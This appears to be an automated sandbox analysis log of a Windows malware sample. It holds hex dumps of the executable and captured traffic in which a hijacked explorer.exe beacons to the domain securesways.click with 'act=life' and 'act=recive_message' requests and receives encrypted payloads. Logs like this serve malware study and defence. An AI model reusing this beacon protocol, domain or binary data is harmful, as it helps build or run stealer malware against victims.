                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: ff 74 0e 8b cf e8 2e fd ff ff 57 e8 ee 8d 00 00 59 83 c6 04 ff 4d fc 75 e0 5f ff 75 0c 8b cb ff 75 08 e8 e3 5a 00 00 5e 5b c9 c2 08 00 56 8b 74 24 08 ff 4e 08 8b 46 08 75 10 8b ce e8 c4 fe ff ff 56 e8 b7 8d 00 00 59 33 c0 5e c2 04 00 56 8b f1 8d 4e 04 e8 c8 fe ff ff 8d 46 78 33 c9 89 4e 74 89 48 04 89 48 08 89 48 0c c7 40 10 04 00 00 00 c7 00 f4 48 41 00 c6 46 68 01 88 0e 8b c6 5e c2 04 00 56 57 8b 7c 24 0c 57 8b f1 e8 b5 fe ff ff 83 c7 50 57 8d 4e 50 e8 af fa ff ff 5f 8b c6 5e c2 04 00 55 8d 6c 24 a4 81 ec f4 00 00 00 56 8b 75 74 89 4d 58 8b ce e8 36 20 00 00 84 c0 75 0d b8 01 40 00 80 5e 83 c5 5c c9 c2 1c 00 53 33 db 8d 45 d0 57 50 89 5d 2c 89 5d 30 89 5d 34 c7 45 38 04 00 00 00 c7 45 28 f4 48 41 00 89 5d cc e8 f5 d6 ff ff 59 ff 75 64 8d 4d cc e8 25 f8
                                                                                                                                                                                                                                              Data Ascii: t.WYMu_uuZ^[Vt$NFuVY3^VNFx3NtHHH@HAFh^VW|$WPWNP_^Ul$VutMX6 u@^\S3EWP],]0]4E8E(HA]YudM%
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: eb 02 33 c0 50 8b cb e8 55 b9 ff ff 5b c2 04 00 8b c1 8b 4c 24 04 c7 00 08 4a 41 00 8b 51 04 89 50 04 8b 51 08 89 50 08 8b 51 0c 89 50 0c 8a 49 10 88 48 10 c2 04 00 53 55 8b 6c 24 0c 56 57 8b 7d 08 8b f1 8b 46 08 03 c7 50 e8 c2 19 00 00 33 db 85 ff 7e 12 8b 45 0c ff 34 98 8b ce e8 ff b8 ff ff 43 3b df 7c ee 5f 8b c6 5e 5d 5b c2 04 00 53 56 8b f1 8d 9e a0 00 00 00 57 8b cb e8 58 1a 00 00 8d 8e b4 00 00 00 e8 4d 1a 00 00 33 ff 39 7e 1c 76 2b 8b 46 58 8d 04 b8 83 38 00 74 08 8b 4e 30 8d 0c f9 89 08 8b 86 84 00 00 00 8b 04 b8 ff 30 8b cb e8 a8 b8 ff ff 47 3b 7e 1c 72 d5 33 ff 39 7e 20 76 2f 8b 46 6c 8d 04 b8 83 38 00 74 08 8b 4e 44 8d 0c f9 89 08 8b 86 98 00 00 00 8b 04 b8 ff 30 8d 8e b4 00 00 00 e8 72 b8 ff ff 47 3b 7e 20 72 d1 8b 5e 14 85 db 8b 96 c0 00 00
                                                                                                                                                                                                                                              Data Ascii: 3PU[L$JAQPQPQPIHSUl$VW}FP3~E4C;|_^][SVWXM39~v+FX8tN00G;~r39~ v/Fl8tND0rG;~ r^
                                                                                                                                                                                                                                              2024-12-21 13:59:11 UTC16384INData Raw: 50 04 8b c8 f7 d9 1b c9 23 ca 8b 55 10 89 0a eb bc 68 c8 48 41 00 56 e8 56 06 ff ff 85 c0 59 59 74 08 8b 45 08 8d 50 08 eb d8 68 98 48 41 00 56 e8 3d 06 ff ff 85 c0 59 59 74 08 8b 45 08 8d 50 0c eb bf 68 b8 48 41 00 56 e8 24 06 ff ff 85 c0 59 59 74 08 8b 45 08 8d 50 10 eb a6 68 18 48 41 00 56 e8 0b 06 ff ff 85 c0 59 59 74 08 8b 45 08 8d 50 14 eb 8d b8 02 40 00 80 5e 5d c2 0c 00 56 8b 74 24 08 68 80 76 41 00 ff 74 24 14 8d 46 28 ff 74 24 14 50 e8 be fd ff ff 83 c4 10 e8 1e e5 ff ff 85 c0 75 0f 8d 4e fc c6 86 98 00 00 00 01 e8 78 e5 ff ff 5e c2 0c 00 8b 54 24 04 85 d2 0f 95 c0 84 c0 88 81 9d 00 00 00 74 11 8b 02 89 81 a0 00 00 00 8b 42 04 89 81 a4 00 00 00 83 a1 b0 00 00 00 00 83 a1 b4 00 00 00 00 83 a1 c4 00 00 00 00 83 c1 2c 51 e8 44 f9 ff ff 59 c2 04 00
                                                                                                                                                                                                                                              Data Ascii: P#UhHAVVYYtEPhHAV=YYtEPhHAV$YYtEPhHAVYYtEP@^]Vt$hvAt$F(t$PuNx^T$tB,QDY
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: 72 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 51 02 4c 65 61 76 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 8e 03 57 61 69 74 46 6f 72 4d 75 6c 74 69 70 6c 65 4f 62 6a 65 63 74 73 00 00 4b 45 52 4e 45 4c 33 32 2e 64 6c 6c 00 00 d8 02 77 73 70 72 69 6e 74 66 57 00 40 02 53 65 6e 64 4d 65 73 73 61 67 65 57 00 00 c6 00 45 6e 64 44 69 61 6c 6f 67 00 37 00 43 68 61 72 55 70 70 65 72 57 00 00 99 00 44 65 73 74 72 6f 79 57 69 6e 64 6f 77 00 b5 01 4b 69 6c 6c 54 69 6d 65 72 00 a2 00 44 69 73 70 61 74 63 68 4d 65 73 73 61 67 65 57 00 00 3e 01 47 65 74 4d 65 73 73 61 67 65 57 00 7a 02 53 65 74 54 69 6d 65 72 00 00 61 00 43 72 65 61 74 65 57 69 6e 64 6f 77 45 78 57 00 31 02 53 63 72 65 65 6e 54 6f 43 6c 69 65 6e 74 00 00 74 01 47 65 74 57 69 6e 64
                                                                                                                                                                                                                                              Data Ascii: rCriticalSectionQLeaveCriticalSectionWaitForMultipleObjectsKERNEL32.dllwsprintfW@SendMessageWEndDialog7CharUpperWDestroyWindowKillTimerDispatchMessageW>GetMessageWzSetTimeraCreateWindowExW1ScreenToClienttGetWind
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: 0b 67 a0 a1 4b 9b cd ff 71 bb ea ff 6f ba ea ff 6f ba ea ff 6f ba e9 ff 6f b9 ea ff 6f ba ea ff 6f ba ea ff 6f b9 ea ff 6f ba ea ff 6f ba ea ff 6f b9 ea ff 6f ba ea ff 6f ba ea ff 6f b9 ea ff 6f ba ea ff 6f ba ea ff 6e ba ea ff 6f ba ea ff 6e b9 e9 ff 6d b9 e9 ff 6c b8 e8 ff 6b b7 e7 ff 69 b6 e7 ff 68 b4 e6 ff 66 b3 e4 ff 64 b1 e3 ff 61 b0 e2 ff 5f ae e0 ff 5d ac df ff 5d ac de ff 53 a0 d1 ff 33 81 b2 b5 24 78 a9 03 33 81 b2 13 1a 70 a7 8f 10 6b a4 f9 0c 67 a0 f5 00 66 99 03 00 00 00 03 00 00 00 01 00 00 00 03 0b 66 a0 85 35 8c c4 ff 60 b0 e4 ff 34 89 be ff 19 70 a6 cd 1c 72 a8 8b 32 87 bc ff 6f ba e9 ff 6e ba e9 ff 6f ba e9 ff 6f ba e9 ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea ff 6f ba ea
                                                                                                                                                                                                                                              Data Ascii: gKqooooooooooooooononmlkihfda_]]S3$x3pkgff5`4pr2onoooooooooooo
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: 10 4b 72 ff 10 4b 72 ff 10 4b 72 ff 10 4b 72 ff 10 4b 72 ff 10 4a 71 ff 10 4a 71 ff 10 4a 71 ff 10 4a 71 ff 0f 4a 71 ff 0f 4a 71 ff 0f 4a 71 ff 0f 4a 71 ff 0f 4a 70 ff 0f 4a 70 ff 0f 4a 70 ff 0f 4a 70 ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 49 6f ff 0f 48 6e ff 0f 48 6e ff 0f 48 6e ff 0f 48 6e ff 0f 48 6e ff 0f 48 6e ff 0f 48 6d ff 0f 48 6d ff 0f 47 6d ff 0f 47 6d ff 0f 47 6d ff 0f 47 6d ff 0f 47 6d ff 43 7a 9d ff b1 da f3 ff b6 dc f4 ff a9 d5 f2 ff 9b cf f0 ff 8e c8 ee ff 81 c2 ec ff 4f 9d d0 ff 0c 67 a0 f9 15 6a aa 05 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 0c 67 9f 49 0c 67 a0 ff 4c 97 c7 ff 92 ca ee ff 9b ce f0 ff a2 d2 f1 ff a9 d6 f2 ff 80 b6 d9 ff 6b a4 c9 ff 11 51 7b
                                                                                                                                                                                                                                              Data Ascii: KrKrKrKrKrJqJqJqJqJqJqJqJqJpJpJpJpIoIoIoIoIoIoIoIoHnHnHnHnHnHnHmHmGmGmGmGmGmCzOgjgIgLkQ{
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: c1 c1 c1 ff c2 c2 c2 ff c7 c7 c7 ff cf cf cf ff d0 d0 d0 ff bc bc bc ff 80 80 80 ff 80 80 80 ff 77 77 77 cd 05 05 05 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 37 00 00 00 35 00 00 00 35 00 00 00 35 00 00 00 35 00 00 00 35 00 00 00 35 00 00 00 33 00 00 00 33 00 00 00 31 00 00 00 31 00 00 00 2f 00 00 00 2b 00 00 00 29 00 00 00 25 00 00 00 23 00 00 00 1f 00 00 00 1b 00 00 00 17 00 00 00 15 00 00 00 11 00 00 00 0d 00 00 00 0b 00 00 00 09 00 00 00 05 00 00 00 05 00 00 00 03 00 00 00 03 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                                                              Data Ascii: www777777777777775555553311/+)%#
                                                                                                                                                                                                                                              2024-12-21 13:59:12 UTC16384INData Raw: de de de ff e0 e0 e0 ff e1 e1 e1 ff e2 e2 e2 ff e3 e3 e3 ff e4 e4 e4 ff e9 e9 e9 ff ec ec ec ff e9 e9 e9 ff 89 89 89 ff 80 80 80 ff 6f 87 97 ff 42 98 d0 ff 42 98 d0 ff 42 98 d0 ff 42 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 43 98 d0 ff 5c a6 d6 ff 79 b6 dd ff 79 b6 dd ff 2b 80 b5 ff 0c 67 a0 ff 0c 67 a0 ff 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                                                                                                                                                              Data Ascii: oBBBBCCCCCCCCCCCCCCCC\yy+gg


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              3192.168.2.549803104.21.16.1443940C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 13:59:54 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                              Host: securesways.click
                                                                                                                                                                                                                                              2024-12-21 13:59:54 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                              2024-12-21 13:59:56 UTC1132INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 13:59:56 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=1qt3fece0chs0fgivckd80anu6; expires=Wed, 16 Apr 2025 07:46:35 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSeIvVPl4ihYQQmPtCBmkkFIDloIpRDkn05Rzm2QRZ3KKeCXALTVPzYyEu%2BsSbvnxetEGohFlJjQc%2BvgxHAuMugZ%2B4stYUsUtbIXRb1gKLpNco7%2BJZFtP5dmF1IZ3OLxDs0z2g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f58653459b01881-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1568&min_rtt=1560&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=908&delivery_rate=1795817&cwnd=238&unsent_bytes=0&cid=80c52c5e7ffd3180&ts=2935&x=0"
                                                                                                                                                                                                                                              2024-12-21 13:59:56 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                              2024-12-21 13:59:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              4192.168.2.549815104.21.16.1443940C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-12-21 13:59:58 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              Content-Length: 42
                                                                                                                                                                                                                                              Host: securesways.click
                                                                                                                                                                                                                                              2024-12-21 13:59:58 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 41 42 31 35 67 31 2d 2d 26 6a 3d
                                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=AB15g1--&j=
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 21 Dec 2024 13:59:58 GMT
                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=hjv6nuq6bl12qdgr4vdpbcgicf; expires=Wed, 16 Apr 2025 07:46:37 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=72h7qf0S%2FW9zRoT64U4ON8h4Kl4tFqLdM4ffCADb2j9dENRBrkWERaOuMlQ%2BDC1Bj68bn%2FGBNZhd9lOa0H5yz%2Fm4IfXnYx9cGNMj9ji6uFJdJZPPXS2X11ybctFoQsIg%2FYTbiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8f58654e4c2f7293-EWR
                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2024&min_rtt=2016&rtt_var=773&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=943&delivery_rate=1399137&cwnd=158&unsent_bytes=0&cid=51d7391720ebc248&ts=864&x=0"
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC236INData Raw: 34 39 31 63 0d 0a 4a 31 73 4e 45 4a 39 6b 37 65 6e 52 59 33 53 35 61 33 66 2b 6c 67 73 66 58 53 44 47 52 44 6d 4f 73 4f 56 74 57 6d 4c 48 59 72 35 63 65 58 73 79 70 56 44 42 79 36 49 47 56 6f 4d 66 42 59 76 7a 4a 7a 30 38 52 4f 52 2b 58 2b 2f 63 6c 67 68 32 51 4c 45 50 6e 42 30 39 62 48 7a 73 41 63 48 4c 74 42 74 57 67 7a 41 4d 33 50 4e 6c 50 57 63 43 6f 79 35 62 37 39 79 48 44 44 45 4e 74 77 37 64 54 7a 64 71 65 50 6f 48 69 59 69 39 44 68 48 63 44 68 61 55 2b 47 4a 79 4e 55 33 6b 61 42 76 72 79 73 64 58 65 43 2b 69 46 74 39 71 4f 6e 35 37 76 52 6e 42 6b 76 4d 47 47 70 74 52 56 5a 2f 7a 61 58 4d 37 52 4b 30 73 55 65 62 55 68 67 6b 77 45 71 34 45 31 6b 38 35 61 58 6e 77 44 70 32 46 74 77 6b 61 32 67
                                                                                                                                                                                                                                              Data Ascii: 491cJ1sNEJ9k7enRY3S5a3f+lgsfXSDGRDmOsOVtWmLHYr5ceXsypVDBy6IGVoMfBYvzJz08ROR+X+/clgh2QLEPnB09bHzsAcHLtBtWgzAM3PNlPWcCoy5b79yHDDENtw7dTzdqePoHiYi9DhHcDhaU+GJyNU3kaBvrysdXeC+iFt9qOn57vRnBkvMGGptRVZ/zaXM7RK0sUebUhgkwEq4E1k85aXnwDp2Ftwka2g
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 51 57 33 4c 6f 70 65 69 63 43 2f 47 59 49 33 74 47 57 48 69 30 4e 74 51 61 63 57 6e 64 32 4d 76 6f 4b 7a 39 50 7a 43 52 72 56 44 42 61 54 38 32 68 39 4c 55 32 6b 4a 56 50 6b 31 6f 30 41 4e 77 2b 72 43 74 74 4e 4d 47 68 39 2b 67 36 4a 68 4c 42 42 57 4a 73 4f 44 64 79 73 4b 56 30 76 51 61 63 79 56 76 32 53 6d 45 45 68 51 4b 49 4d 6e 42 31 35 61 58 7a 38 43 34 2b 5a 75 77 6f 64 33 68 73 65 6c 66 6c 6b 66 54 4a 49 71 79 56 62 36 39 69 4e 41 44 49 45 71 41 33 61 52 54 6b 76 50 4c 30 42 6c 38 76 72 51 54 58 65 47 52 4b 51 34 69 74 48 66 31 33 71 50 78 76 72 33 73 64 58 65 41 69 67 41 39 39 4f 4e 6d 78 36 39 68 53 50 6d 62 55 4d 45 38 6b 50 45 4a 4c 2b 61 6d 38 31 54 4b 49 6c 55 75 66 62 67 67 67 38 51 4f 74 41 32 31 31 35 4e 7a 4c 63 43 34 53 48 75 52 59 57 6d
                                                                                                                                                                                                                                              Data Ascii: QW3LopeicC/GYI3tGWHi0NtQacWnd2MvoKz9PzCRrVDBaT82h9LU2kJVPk1o0ANw+rCttNMGh9+g6JhLBBWJsODdysKV0vQacyVv2SmEEhQKIMnB15aXz8C4+Zuwod3hselflkfTJIqyVb69iNADIEqA3aRTkvPL0Bl8vrQTXeGRKQ4itHf13qPxvr3sdXeAigA99ONmx69hSPmbUME8kPEJL+am81TKIlUufbggg8QOtA2115NzLcC4SHuRYWm
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 30 5a 57 38 7a 53 4b 49 70 56 75 43 53 79 55 38 2f 47 4f 56 59 6e 47 38 36 65 33 48 33 52 4c 71 49 76 51 38 52 7a 55 6b 4b 30 75 30 70 65 6a 4d 43 2f 47 5a 57 37 64 71 42 48 54 63 4e 70 67 37 53 53 6a 78 67 65 76 30 47 67 6f 36 33 43 68 33 59 42 42 47 4f 2f 6d 6c 31 4f 6b 4f 75 4c 42 75 69 6b 6f 41 58 65 46 6a 6c 4d 63 74 4f 65 31 70 78 38 77 69 49 6e 66 4d 65 57 4d 4a 4a 45 70 43 30 4d 54 30 79 53 71 45 6a 56 4f 33 59 69 51 6f 79 44 4b 30 4f 33 31 63 32 61 33 4c 78 44 6f 57 47 76 51 55 65 30 67 49 65 6d 76 52 6f 64 33 38 4d 35 43 46 44 72 49 72 48 4f 7a 38 4d 71 41 2b 65 63 44 70 68 66 50 6f 51 7a 35 54 39 47 46 62 63 42 56 58 45 74 47 56 30 50 30 6d 75 49 6c 76 72 33 34 49 4d 50 77 4f 6f 42 39 5a 4c 50 6d 74 2b 39 41 75 4a 69 37 51 46 45 38 6b 4d 48 4a
                                                                                                                                                                                                                                              Data Ascii: 0ZW8zSKIpVuCSyU8/GOVYnG86e3H3RLqIvQ8RzUkK0u0pejMC/GZW7dqBHTcNpg7SSjxgev0Ggo63Ch3YBBGO/ml1OkOuLBuikoAXeFjlMctOe1px8wiInfMeWMJJEpC0MT0ySqEjVO3YiQoyDK0O31c2a3LxDoWGvQUe0gIemvRod38M5CFDrIrHOz8MqA+ecDphfPoQz5T9GFbcBVXEtGV0P0muIlvr34IMPwOoB9ZLPmt+9AuJi7QFE8kMHJ
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 4d 56 54 6b 4f 52 58 31 6b 6f 41 44 65 46 6a 6c 43 64 56 58 4e 32 46 37 38 41 43 48 6a 4c 30 4d 48 64 30 43 45 70 76 79 5a 48 55 79 52 36 63 6e 58 2b 62 41 68 41 51 79 44 61 39 41 6b 67 55 2b 64 7a 4b 6c 52 71 69 48 6d 68 45 4e 79 52 39 56 67 37 70 77 50 54 68 4f 35 48 34 62 37 39 32 4f 41 44 41 49 71 67 2f 59 53 7a 39 70 66 2f 67 4a 68 5a 6d 37 44 78 76 51 42 68 36 4f 39 47 52 35 4d 30 61 73 4c 56 47 73 6e 4d 63 49 49 45 44 39 51 4f 6c 49 4e 6d 39 78 36 30 61 51 78 61 70 42 45 64 64 4a 54 64 7a 34 5a 33 30 77 54 71 67 74 55 2b 33 65 69 51 67 39 43 61 30 49 7a 6b 51 39 5a 33 50 7a 43 59 36 50 74 67 51 53 33 41 30 54 6b 37 51 6e 50 54 68 61 35 48 34 62 77 2f 57 79 54 52 6b 36 35 52 2b 53 58 48 6c 6f 66 72 31 65 7a 34 65 77 44 52 37 55 44 78 79 51 2f 6d 42
                                                                                                                                                                                                                                              Data Ascii: MVTkORX1koADeFjlCdVXN2F78ACHjL0MHd0CEpvyZHUyR6cnX+bAhAQyDa9AkgU+dzKlRqiHmhENyR9Vg7pwPThO5H4b792OADAIqg/YSz9pf/gJhZm7DxvQBh6O9GR5M0asLVGsnMcIIED9QOlINm9x60aQxapBEddJTdz4Z30wTqgtU+3eiQg9Ca0IzkQ9Z3PzCY6PtgQS3A0Tk7QnPTha5H4bw/WyTRk65R+SXHlofr1ez4ewDR7UDxyQ/mB
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 79 4a 59 36 4e 65 49 44 6a 6b 47 74 77 66 56 56 7a 64 69 66 66 55 4f 68 6f 71 33 42 42 76 64 42 52 2b 64 38 32 64 7a 4e 77 4c 71 5a 6c 7a 30 6b 74 39 50 47 52 43 2b 45 73 70 49 47 47 4a 39 76 52 6e 42 6b 76 4d 47 47 70 74 52 56 5a 58 6d 62 58 41 74 53 36 4d 6f 56 4f 2f 41 68 67 49 7a 45 71 49 50 32 45 49 31 61 58 33 37 42 34 71 42 76 77 59 54 30 41 59 5a 33 4c 6f 70 65 69 63 43 2f 47 5a 31 35 38 47 51 44 44 59 4c 73 78 75 63 57 6e 64 32 4d 76 6f 4b 7a 39 50 7a 41 68 33 51 44 52 57 51 39 47 31 77 50 31 43 72 49 56 7a 6c 32 5a 55 46 50 77 65 75 43 4e 64 4b 50 33 31 2b 38 78 53 4b 6d 61 46 42 57 4a 73 4f 44 64 79 73 4b 55 73 34 55 72 51 6c 47 64 33 45 68 42 6b 7a 44 61 6c 41 77 77 73 67 4c 33 58 78 52 74 66 4c 74 51 34 66 32 41 59 55 6c 66 68 6b 65 44 5a 48
                                                                                                                                                                                                                                              Data Ascii: yJY6NeIDjkGtwfVVzdiffUOhoq3BBvdBR+d82dzNwLqZlz0kt9PGRC+EspIGGJ9vRnBkvMGGptRVZXmbXAtS6MoVO/AhgIzEqIP2EI1aX37B4qBvwYT0AYZ3LopeicC/GZ158GQDDYLsxucWnd2MvoKz9PzAh3QDRWQ9G1wP1CrIVzl2ZUFPweuCNdKP31+8xSKmaFBWJsODdysKUs4UrQlGd3EhBkzDalAwwsgL3XxRtfLtQ4f2AYUlfhkeDZH
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 66 63 74 51 77 6a 51 4c 70 4f 78 51 55 2b 59 7a 4b 6c 52 6f 79 4d 73 41 41 63 30 67 55 61 6d 2f 42 37 64 7a 68 51 70 53 64 51 34 64 36 48 41 6a 55 4b 70 41 6e 52 53 54 52 6f 64 66 49 44 7a 38 58 7a 42 67 36 62 55 56 57 39 2b 57 4a 78 5a 42 6a 6b 4f 52 58 31 6b 6f 41 44 65 46 6a 6c 41 4e 5a 41 4d 32 4a 78 38 67 57 64 69 72 55 54 46 74 59 44 42 35 62 2f 62 48 41 79 54 36 63 67 58 65 66 65 6c 51 59 34 41 36 35 41 6b 67 55 2b 64 7a 4b 6c 52 71 79 63 70 51 73 52 31 78 38 65 6e 66 64 2f 63 43 38 43 36 6d 5a 4b 36 38 50 48 56 79 34 51 73 67 66 44 43 79 41 76 64 66 46 47 31 38 75 31 43 42 44 63 44 78 75 4f 38 57 39 79 4d 45 75 74 49 6c 50 76 30 6f 4d 4c 50 77 57 6d 44 4e 64 43 4f 6d 42 32 39 41 69 47 68 50 4e 50 56 74 77 52 56 63 53 30 53 47 59 38 54 71 6c 6d 52
                                                                                                                                                                                                                                              Data Ascii: fctQwjQLpOxQU+YzKlRoyMsAAc0gUam/B7dzhQpSdQ4d6HAjUKpAnRSTRodfIDz8XzBg6bUVW9+WJxZBjkORX1koADeFjlANZAM2Jx8gWdirUTFtYDB5b/bHAyT6cgXefelQY4A65AkgU+dzKlRqycpQsR1x8enfd/cC8C6mZK68PHVy4QsgfDCyAvdfFG18u1CBDcDxuO8W9yMEutIlPv0oMLPwWmDNdCOmB29AiGhPNPVtwRVcS0SGY8TqlmR
                                                                                                                                                                                                                                              2024-12-21 13:59:59 UTC1369INData Raw: 50 64 6b 43 69 47 4a 77 64 65 55 39 35 36 77 4f 49 6e 66 45 30 46 64 55 48 45 6f 71 30 64 6b 4a 78 41 71 73 38 47 37 54 72 6e 6b 38 2f 44 4f 56 59 6e 46 41 2b 62 33 58 6e 45 49 69 48 6f 67 6f 62 31 79 73 61 6d 2b 4a 71 63 6a 78 54 72 57 70 51 34 5a 4c 4a 54 7a 38 59 35 56 69 63 61 6a 35 35 63 64 49 46 6e 6f 4c 7a 54 31 62 63 48 31 58 45 74 46 63 39 4c 55 47 30 4a 56 54 39 37 4d 64 58 49 54 37 6c 43 38 70 43 4b 57 78 6b 39 67 75 44 6d 6f 31 42 54 6f 39 62 52 38 36 6d 4f 32 4a 2f 58 5a 74 6f 47 2b 32 53 33 7a 59 68 51 4c 4e 41 68 42 64 33 4c 32 43 39 58 73 2f 4d 73 42 4d 45 33 51 6f 44 6e 37 4e 58 51 78 68 55 72 69 46 4c 36 38 57 49 54 33 5a 41 71 6b 43 45 66 48 6c 6d 64 65 59 58 6d 59 61 6a 42 6c 62 6b 52 31 57 45 74 44 45 39 43 6b 47 71 4b 46 7a 36 77 38
